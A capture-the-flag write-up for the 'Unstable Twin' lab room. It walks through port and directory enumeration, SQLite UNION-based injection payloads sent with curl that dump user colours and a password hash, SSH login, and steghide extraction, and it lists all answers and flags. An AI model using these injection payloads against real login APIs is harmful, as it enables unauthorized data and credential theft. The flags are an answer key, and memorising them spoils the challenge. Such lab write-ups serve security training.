Unstable Twin#

A services based room that hides information inside HTTP services. We need to find the keys and bring the family back together

Task 1: Unstable Twin#

Story recap: Julius and Vincent deployed two services. One of them is broken. We must find clues, recover credentials, and get the flags.

Answers (quick view)#

Build number (Vincent): 1.3.4-dev
Build number (Julius): 1.3.6-final
Number of users: 5
Vincent’s color: Orange
Mary Ann SSH password: experiment
User flag: THM{Mary_Ann_notes}
Final flag: THM{The_Family_Is_Back_Together}

Step 1: Scan the target#

We run Nmap to see open ports and services. This tells us what to attack first.

1
╭─cat0x01 at cat0x01 in ~
2
╰─○ nmap -sC -sV -sS -v 10.66.153.113
3
...
4
PORT   STATE SERVICE VERSION
5
22/tcp open  ssh     OpenSSH 8.0 (protocol 2.0)
6
80/tcp open  http    nginx 1.14.1

Result: SSH and HTTP are open. We start with HTTP because it usually gives hints and easier entry points.

Nmap scan

Step 2: Find web paths with ffuf#

ffuf root scan

We brute force common directories to discover hidden endpoints.

1
╭─cat0x01 at cat0x01 in ~
2
╰─○ ffuf -u http://10.66.153.113/FUZZ -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
3
...
4
info                    [Status: 200, Size: 160, Words: 31, Lines: 2]

ffuf POST scan

We also try POST because some APIs only answer to POST.

1
╭─cat0x01 at cat0x01 in ~
2
╰─○ ffuf -u http://10.66.153.113/FUZZ -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -X POST
3
...
4
api                     [Status: 405, Size: 178, Words: 20, Lines: 5]
5
info                    [Status: 405, Size: 178, Words: 20, Lines: 5]

The /api path exists, but it blocks POST at this level. We enumerate inside it.

ffuf /api scan

1
╭─cat0x01 at cat0x01 in ~
2
╰─○ ffuf -u http://10.66.153.113/api/FUZZ -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
3
...
4
login                   [Status: 405, Size: 178, Words: 20, Lines: 5]

Step 3: Check `/info`#

info headers

We call /info to read headers. The response tells us the build number and server name.

1
╭─cat0x01 at cat0x01 in ~
2
╰─○ curl -v http://10.66.153.113/info
3
*   Trying 10.66.153.113:80...
4
* Established connection to 10.66.153.113 (10.66.153.113 port 80) from 192.168.183.99 port 53636
5
* using HTTP/1.x
6
> GET /info HTTP/1.1
7
> Host: 10.66.153.113
8
> User-Agent: curl/8.18.0
9
> Accept: */*
10
>
11
* Request completely sent off
12
< HTTP/1.1 200 OK
13
< Server: nginx/1.14.1
14
< Date: Wed, 18 Feb 2026 01:18:13 GMT
15
< Content-Type: application/json
16
< Content-Length: 160
17
< Connection: keep-alive
18
< Build Number: 1.3.4-dev
19
< Server Name: Vincent
20
<
21
"The login API needs to be called with the username and password form fields fields.  It has not been fully tested yet so may not be full developed and secure"
22
* Connection #0 to host 10.66.153.113:80 left intact

This gives the answer for Vincent’s build number and tells us which server we are talking to

We try /api/login with POST and basic credentials. The server responds with inconsistent output. That hints at two different backend services

1
╭─cat0x01 at cat0x01 in ~
2
╰─○ curl -X POST http://10.66.153.113/api/login -d "username=admin&password=password"
3
"The username or password passed are not correct."
4

5
╭─cat0x01 at cat0x01 in ~
6
╰─○ curl -X POST http://10.66.153.113/api/login -d "username=admin&password=password"
7
[]

Sometimes it returns HTML errors, sometimes JSON. That means requests are hitting different services behind a load balancer

SQLi proof

We test for SQL injection. The API returns SQLite version, which confirms SQLi.

1
╭─cat0x01 at cat0x01 in ~
2
╰─○ curl -X POST http://10.66.153.113/api/login -d "username=admin' UNION SELECT 1,sqlite_version(); -- -&password=admin"
3
"The username or password passed are not correct."
4

5
╭─cat0x01 at cat0x01 in ~
6
╰─○ curl -X POST http://10.66.153.113/api/login -d "username=admin' UNION SELECT 1,sqlite_version(); -- -&password=admin"
7
[
8
  [
9
    1,
10
    "3.26.0"
11
  ]
12
]

Now we enumerate tables and users.

1
╭─cat0x01 at cat0x01 in ~
2
╰─○ curl -X POST http://10.66.153.113/api/login -d "username=admin' UNION SELECT 1,tbl_name FROM sqlite_master; -- -&password=admin"
3
"The username or password passed are not correct."
4

5
╭─cat0x01 at cat0x01 in ~
6
╰─○ curl -X POST http://10.66.153.113/api/login -d "username=admin' UNION SELECT 1,tbl_name FROM sqlite_master; -- -&password=admin"
7
[
8
  [
9
    1,
10
    "notes"
11
  ],
12
  [
13
    1,
14
    "sqlite_sequence"
15
  ],
16
  [
17
    1,
18
    "users"
19
  ]
20
]

We list users and colors (passwords in this case are colors).

1
╭─cat0x01 at cat0x01 in ~
2
╰─○ curl -X POST http://10.66.153.113/api/login -d "username=admin' UNION SELECT username,password FROM users; -- -&password=admin"
3
[
4
  [
5
    "julias",
6
    "Red"
7
  ],
8
  [
9
    "linda",
10
    "Green"
11
  ],
12
  [
13
    "marnie",
14
    "Yellow "
15
  ],
16
  [
17
    "mary_ann",
18
    "continue..."
19
  ],
20
  [
21
    "vincent",
22
    "Orange"
23
  ]
24
]

Now we know there are 5 users and Vincent’s color is Orange

Step 6: Read notes table#

We dump the notes and find a hash for Mary Ann’s password.

1
╭─cat0x01 at cat0x01 in ~
2
╰─○ curl -X POST http://10.66.153.113/api/login -d "username=admin' UNION SELECT 1,group_concat(notes) from notes; -- -&password=admin"
3
[
4
  [
5
    1,
6
    "I have left my notes on the server.  They will me help get the family back together. ,My Password is eaf0651dabef9c7de8a70843030924d335a2a8ff5fd1b13c4cb099e66efe25ecaa607c4b7dd99c43b0c01af669c90fd6a14933422cf984324f645b84427343f4\n"
7
  ]
8
]

notes hash

We crack the hash using CrackStation. The password is experiment.

Step 7: SSH to Mary Ann and get the user flag#

We use the password and login via SSH. Inside, we read the user flag.

user flag

We also read server_notes.txt for instructions. It says to collect images by name.

server notes

Step 8: Inspect application files#

We list /opt/unstabletwin and find two Flask apps. This explains the unstable responses.

/opt/unstabletwin listing

One app (port 5000) is Julius with build 1.3.6-final, and the other (port 5001) is Vincent with build 1.3.4-dev

Step 9: Download images from `/get_image`#

The notes say to collect images by name. We call the endpoint with each family member name.

1
╭─cat0x01 at cat0x01 in ~/images
2
╰─○ curl -s http://unstabletwin.thm/get_image --get -d "name=vincent" -o vincent.jpg
3

4
╭─cat0x01 at cat0x01 in ~/images
5
╰─○ curl -s http://unstabletwin.thm/get_image --get -d "name=vincent" -o vincent.jpg
6
╭─cat0x01 at cat0x01 in ~/images
7
╰─○ curl -s http://unstabletwin.thm/get_image --get -d "name=julias" -o julias.jpg
8
╭─cat0x01 at cat0x01 in ~/images
9
╰─○ curl -s http://unstabletwin.thm/get_image --get -d "name=julias" -o julias.jpg
10
╭─cat0x01 at cat0x01 in ~/images
11
╰─○ curl -s http://unstabletwin.thm/get_image --get -d "name=mary_ann" -o mary_ann.jpg
12
╭─cat0x01 at cat0x01 in ~/images
13
╰─○ curl -s http://unstabletwin.thm/get_image --get -d "name=marnie" -o marnie.jpg
14
╭─cat0x01 at cat0x01 in ~/images
15
╰─○ curl -s http://unstabletwin.thm/get_image --get -d "name=marnie" -o marnie.jpg
16
╭─cat0x01 at cat0x01 in ~/images
17
╰─○ curl -s http://unstabletwin.thm/get_image --get -d "name=linda" -o linda.jpg
18
╭─cat0x01 at cat0x01 in ~/images
19
╰─○ curl -s http://unstabletwin.thm/get_image --get -d "name=linda" -o linda.jpg
20
╭─cat0x01 at cat0x01 in ~/images
21
╰─○
22

23

24
╭─cat0x01 at cat0x01 in ~/images
25
╰─○ ls -la
26
total 56
27
drwxrwxr-x  2 cat0x01 cat0x01  4096 Feb 18 02:33 .
28
drwx------ 64 cat0x01 cat0x01  4096 Feb 18 02:34 ..
29
-rw-rw-r--  1 cat0x01 cat0x01     0 Feb 18 02:33 julias.jpg
30
-rw-rw-r--  1 cat0x01 cat0x01     0 Feb 18 02:34 linda.jpg
31
-rw-rw-r--  1 cat0x01 cat0x01     0 Feb 18 02:33 marnie.jpg
32
-rw-rw-r--  1 cat0x01 cat0x01 47303 Feb 18 02:33 mary_ann.jpg
33
-rw-rw-r--  1 cat0x01 cat0x01     0 Feb 18 02:33 vincent.jpg

Images downloaded for all five names

Step 10: Extract hidden text with steghide#

Each image hides a small string. We extract each one.

1
╭─cat0x01 at cat0x01 in ~/images
2
╰─○ steghide extract -sf mary_ann.jpg
3

4
wrote extracted data to "mary_ann.txt".
5

6
╭─cat0x01 at cat0x01 in ~/images
7
╰─○ cat mary_ann.txt
8

9
You need to find all my children and arrange in a rainbow!

1
╭─cat0x01 at cat0x01 in ~/images
2
╰─○ steghide extract -sf julias.jpg
3

4
wrote extracted data to "julias.txt".
5

6
╭─cat0x01 at cat0x01 in ~/images
7
╰─○ cat julias.txt
8

9
Red - 1DVsdb2uEE0k5HK4GAIZ

1
╭─cat0x01 at cat0x01 in ~/images
2
╰─○ steghide extract -sf vincent.jpg
3

4
wrote extracted data to "vincent.txt".
5

6
╭─cat0x01 at cat0x01 in ~/images
7
╰─○ cat vincent.txt
8

9
Orange - PS0Mby2jomUKLjvQ4OSw

1
╭─cat0x01 at cat0x01 in ~/images
2
╰─○ steghide --extract -sf linda.jpg
3

4
wrote extracted data to "linda.txt".
5

6
╭─cat0x01 at cat0x01 in ~/images
7
╰─○ cat linda.txt
8

9
Green - eVYvs6J6HKpZWPG8pfeHoNG1

1
╭─cat0x01 at cat0x01 in ~/images
2
╰─○ steghide --extract -sf marnie.jpg
3

4
wrote extracted data to "marnie.txt".
5

6
╭─cat0x01 at cat0x01 in ~/images
7
╰─○ cat marnie.txt
8

9
Yellow - jKLNAAeCdl2J8BCRuXVX

Step 11: Build the rainbow order#

We are told to arrange in a rainbow. We use the order: Red, Orange, Yellow, Green.

Red = julias = 1DVsdb2uEE0k5HK4GAIZ
Orange = vincent = PS0Mby2jomUKLjvQ4OSw
Yellow = marnie = jKLNAAeCdl2J8BCRuXVX
Green = linda = eVYvs6J6HKpZWPG8pfeHoNG1

Combine them in that order to get the final flag.

final image

Final flag#

THM{The_Family_Is_Back_Together}